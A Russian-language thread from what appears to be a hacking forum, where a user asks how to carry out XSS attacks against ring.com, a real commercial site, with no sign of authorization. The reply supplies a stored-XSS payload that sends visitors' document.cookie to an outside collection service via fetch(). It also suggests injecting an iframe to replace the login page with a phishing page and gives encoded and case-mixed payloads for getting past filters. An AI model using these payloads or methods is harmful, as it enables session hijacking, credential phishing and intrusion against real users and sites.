• XSS.stack #1 – первый литературный журнал от юзеров форума

Научите делать грамотную xss атаку

k1ddddos

(L3) cache
Пользователь
Регистрация
02.05.2023
Сообщения
290
Реакции
43
Доброе утро форумчане!
Вот сайт который тестирую на xss уязвимости https://ring.com/<script>alert(“xss”)</script>
После этого он мне присылает not acceptable, как мне тогда протестировать его на уязвимости reflected xss, stored xss, dom based xss. Прошу заметить в формы xss не срабатывает. Буду благодарен кто поможет и расскажет больше про xss. И скажет как понять что фильтрует сайт с помощью burp suite.
 
Доброе утро форумчане!
Вот сайт который тестирую на xss уязвимости https://ring.com/<script>alert(“xss”)</script>
После этого он мне присылает not acceptable, как мне тогда протестировать его на уязвимости reflected xss, stored xss, dom based xss. Прошу заметить в формы xss не срабатывает. Буду благодарен кто поможет и расскажет больше про xss. И скажет как понять что фильтрует сайт с помощью burp suite.
Есть reflected и stored reflected - это как бы своевременная ячейка которая когда ты инжектнул код появится только у тебя но не у всех, stored же аналогично refletcted хранится и показывается у всех где она была инжектнута, ты можешь с помощью xss кода удаленно подключить https://requestinspector.com/ к такому уязвимому коду js
Код:
<script>fetch("https://requestinspector.com/inspector/VANTIYIDD"+document.cookie)</script>
Если xss будет stored то ты будешь получать cookie авторизованных пользователей в той странице где ты ее инжектнул как и выше говорил, но все же я тестировал этот метод на http протоколе уж незнаю что про https можно сказать,можно как вариант на фишинге поиграть встроив в уязвимое поле js код который позволит заменить iframe страницы на другой к примеру страницу входа этого сайта но вместо оригинального входа будет фишинговая заранее подготовленная.
Так-же если xss не срабатывает можно попробывать закодировать этот самый payload js кода
Например:
Код:
%3CScrIpT%3Ealert%28%27XSS%27%29%3B%3C%2FScrIpT%3E
<script>\u0061\u0S06C\u0065\u0072\u0074('XSS')</script>
___
Оригинал;
<script>alert('xss')</script>
Почитай об уязвимости xss и их методы защиты и пойми что да как работает и их способы обхода.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх